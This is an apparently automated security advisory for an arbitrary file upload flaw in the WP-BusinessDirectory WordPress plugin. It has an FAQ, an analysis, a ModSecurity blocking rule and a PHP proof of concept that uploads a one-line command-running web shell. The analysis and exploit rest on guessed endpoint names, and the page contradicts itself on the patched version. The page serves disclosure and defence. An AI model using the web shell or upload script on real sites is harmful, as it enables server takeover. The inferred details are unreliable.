What is CVE-2026-39591?

CVE-2026-39591 is a high-severity vulnerability in the WP-BusinessDirectory plugin for WordPress, allowing authenticated users with Subscriber-level access and above to upload arbitrary files. This is due to missing file type validation in versions up to and including 4.0.0.

How does this vulnerability work?

The vulnerability allows authenticated attackers to upload files without proper validation, potentially including malicious files such as web shells. These files can be executed on the server, leading to remote code execution.

Who is affected by CVE-2026-39591?

Any WordPress site using the WP-BusinessDirectory plugin version 4.0.0 or earlier is affected. Administrators should check their plugin versions and user roles to assess exposure.

How can I check if my site is vulnerable?

To check for vulnerability, verify if your site is running WP-BusinessDirectory version 4.0.0 or earlier. Additionally, review user roles to see if any accounts have Subscriber-level access or higher.

What is the CVSS score and what does it mean?

CVE-2026-39591 has a CVSS score of 8.8, indicating high severity. This suggests that successful exploitation could lead to significant impacts, including complete server takeover.

How can I fix the vulnerability?

Upgrade the WP-BusinessDirectory plugin to version 4.0.1 or later, which includes a patch for this vulnerability. Additionally, implement server-side file validation and restrict file uploads to authorized user roles.

What are the risks associated with this vulnerability?

Exploitation of this vulnerability can lead to arbitrary file uploads, remote code execution, and complete compromise of the WordPress installation. Attackers could gain persistent access and steal sensitive data.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can exploit the vulnerability by uploading a malicious PHP file through the plugin’s file upload endpoint. It highlights the lack of file type validation and the ease of exploitation.

What additional security measures should I consider?

In addition to patching the vulnerability, consider implementing security plugins that monitor file uploads, conducting regular security audits, and enforcing strong user access controls.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, ensure that all plugins are regularly updated, perform security reviews before deploying new plugins, and implement strict file upload policies across your WordPress site.

What should I do if I suspect exploitation?

If you suspect exploitation, immediately review server logs for unauthorized file uploads, change passwords for affected accounts, and consider restoring from a clean backup. Conduct a full security assessment.

Where can I find more information about this vulnerability?

For more information about CVE-2026-39591, refer to the official CVE database, security advisories from the plugin developer, and trusted cybersecurity resources that discuss WordPress vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 19, 2026

CVE-2026-39591: WP-BusinessDirectory – Business directory plugin for WordPress <= 4.0.0 – Authenticated (Subscriber+) Arbitrary File Upload (wp-businessdirectory)

CVE ID CVE-2026-39591

Plugin wp-businessdirectory

Severity High (CVSS 8.8)

CWE 434

Vulnerable Version 4.0.0

Patched Version —

Disclosed April 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-39591 (metadata-based):
The WP-BusinessDirectory plugin for WordPress versions up to and including 4.0.0 contains an authenticated arbitrary file upload vulnerability. Attackers with Subscriber-level permissions or higher can upload malicious files to the server. This vulnerability receives a CVSS score of 8.8 (High severity).

Atomic Edge research infers the root cause is missing file type validation in one or more file upload handlers. The CWE-434 classification confirms unrestricted upload of dangerous file types. Without access to the source code diff, this conclusion is based on the vulnerability description and CWE mapping. The plugin likely processes file uploads without checking file extensions, MIME types, or file signatures. WordPress capability checks may have been present but insufficient, allowing any authenticated user to access the vulnerable upload functionality.

Exploitation requires an authenticated WordPress user account with at least Subscriber privileges. Attackers would identify the plugin’s file upload endpoint, typically an AJAX handler or REST API route. The endpoint likely accepts POST requests with multipart/form-data containing a file parameter. Attackers can upload files with dangerous extensions like .php, .phtml, or .phar. The uploaded file would be placed in a web-accessible directory, enabling direct HTTP requests to execute the malicious code.

The patch in version 4.0.1 likely implements proper file validation. Remediation should include server-side validation of file extensions against an allow list, MIME type verification, and file signature checking. The fix should also implement proper capability checks, restricting upload functionality to appropriate user roles. WordPress nonce verification should be added if absent to prevent CSRF attacks.

Successful exploitation leads to arbitrary file upload and potential remote code execution. Attackers can upload web shells to gain persistent backdoor access, execute operating system commands, and compromise the entire WordPress installation. This vulnerability enables complete server takeover, data theft, and further network penetration. The impact is particularly severe because Subscriber accounts are easily obtainable through registration or social engineering.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-39591 (metadata-based)
# This rule blocks file upload exploitation targeting the WP-BusinessDirectory plugin.
# The rule matches the inferred AJAX endpoint and checks for dangerous file extensions.
# Without access to exact vulnerable code, the rule targets common upload patterns.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:202639591,phase:2,deny,status:403,chain,msg:'CVE-2026-39591 via WP-BusinessDirectory AJAX file upload',severity:'CRITICAL',tag:'CVE-2026-39591',tag:'WordPress',tag:'Plugin',tag:'WP-BusinessDirectory'"
  SecRule ARGS_POST:action "@rx ^(wp_)?businessdirectory" "chain,t:lowercase"
    SecRule FILES "@rx .(php|phtml|phar|php[0-9]+|php.|htaccess|pl|cgi|sh|bash|py|rb|js)$" "t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-39591 - WP-BusinessDirectory – Business directory plugin for WordPress <= 4.0.0 - Authenticated (Subscriber+) Arbitrary File Upload
<?php
/**
 * Proof of Concept for CVE-2026-39591
 * Assumptions based on metadata analysis:
 * 1. The plugin has a file upload endpoint accessible via AJAX or REST API
 * 2. The endpoint lacks proper file type validation
 * 3. Subscriber-level authentication is sufficient
 * 4. The endpoint accepts multipart/form-data with a file parameter
 *
 * Without access to vulnerable code, this PoC demonstrates the attack pattern
 * using common WordPress plugin structures. Actual endpoint and parameter names
 * may differ from those inferred below.
 */

$target_url = 'https://example.com/wp-admin/admin-ajax.php';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Create a simple PHP web shell payload
$malicious_content = '<?php if(isset($_REQUEST["cmd"])) { system($_REQUEST["cmd"]); } ?>';
$payload_file = tempnam(sys_get_temp_dir(), 'shell_');
file_put_contents($payload_file, $malicious_content);

// Initialize cURL session for WordPress login
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => str_replace('admin-ajax.php', 'wp-login.php', $target_url),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url,
        'testcookie' => '1'
    ]),
    CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded']
]);

$response = curl_exec($ch);

if (strpos($response, 'Dashboard') === false && strpos($response, 'admin-ajax') === false) {
    echo "[-] Login failed. Check credentials.n";
    exit;
}

echo "[+] Authentication successful.n";

// Attempt file upload via inferred AJAX endpoint
// Common patterns for business directory plugins include 'upload_listing_image', 'add_business_logo', etc.
// The actual action parameter value may differ.
$post_fields = [
    'action' => 'wp_businessdirectory_upload',  // Inferred from plugin slug
    'nonce' => 'bypassed_or_missing',  // Nonce may be absent or bypassable
    'file' => new CURLFile($payload_file, 'application/x-php', 'shell.php')
];

curl_setopt_array($ch, [
    CURLOPT_URL => $target_url,
    CURLOPT_POSTFIELDS => $post_fields,
    CURLOPT_HTTPHEADER => []  // Let cURL set multipart boundary
]);

$upload_response = curl_exec($ch);
curl_close($ch);

// Clean up temporary file
unlink($payload_file);

// Parse response for upload success indicators
if (strpos($upload_response, 'success') !== false || 
    strpos($upload_response, 'url') !== false ||
    strpos($upload_response, '.php') !== false) {
    echo "[+] File upload likely successful. Check response for file location:n";
    echo substr($upload_response, 0, 500) . "n";
} else {
    echo "[-] Upload may have failed. Response:n";
    echo substr($upload_response, 0, 500) . "n";
}

// Note: Without exact endpoint and parameter names, this PoC may require adjustment.
// Attackers would enumerate possible action values and file parameter names.
?>

Frequently Asked Questions

What is CVE-2026-39591?
Overview of the vulnerability
CVE-2026-39591 is a high-severity vulnerability in the WP-BusinessDirectory plugin for WordPress, allowing authenticated users with Subscriber-level access and above to upload arbitrary files. This is due to missing file type validation in versions up to and including 4.0.0.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows authenticated attackers to upload files without proper validation, potentially including malicious files such as web shells. These files can be executed on the server, leading to remote code execution.
Who is affected by CVE-2026-39591?
Identifying vulnerable installations
Any WordPress site using the WP-BusinessDirectory plugin version 4.0.0 or earlier is affected. Administrators should check their plugin versions and user roles to assess exposure.
How can I check if my site is vulnerable?
Steps for assessment
To check for vulnerability, verify if your site is running WP-BusinessDirectory version 4.0.0 or earlier. Additionally, review user roles to see if any accounts have Subscriber-level access or higher.
What is the CVSS score and what does it mean?
Understanding severity ratings
CVE-2026-39591 has a CVSS score of 8.8, indicating high severity. This suggests that successful exploitation could lead to significant impacts, including complete server takeover.
How can I fix the vulnerability?
Remediation steps
Upgrade the WP-BusinessDirectory plugin to version 4.0.1 or later, which includes a patch for this vulnerability. Additionally, implement server-side file validation and restrict file uploads to authorized user roles.
What are the risks associated with this vulnerability?
Potential impacts of exploitation
Exploitation of this vulnerability can lead to arbitrary file uploads, remote code execution, and complete compromise of the WordPress installation. Attackers could gain persistent access and steal sensitive data.
What does the proof of concept demonstrate?
Understanding the attack pattern
The proof of concept illustrates how an attacker can exploit the vulnerability by uploading a malicious PHP file through the plugin’s file upload endpoint. It highlights the lack of file type validation and the ease of exploitation.
What additional security measures should I consider?
Enhancing overall security
In addition to patching the vulnerability, consider implementing security plugins that monitor file uploads, conducting regular security audits, and enforcing strong user access controls.
How can I prevent similar vulnerabilities in the future?
Best practices for WordPress security
To prevent similar vulnerabilities, ensure that all plugins are regularly updated, perform security reviews before deploying new plugins, and implement strict file upload policies across your WordPress site.
What should I do if I suspect exploitation?
Responding to a potential breach
If you suspect exploitation, immediately review server logs for unauthorized file uploads, change passwords for affected accounts, and consider restoring from a clean backup. Conduct a full security assessment.
Where can I find more information about this vulnerability?
Resources for further reading
For more information about CVE-2026-39591, refer to the official CVE database, security advisories from the plugin developer, and trusted cybersecurity resources that discuss WordPress vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations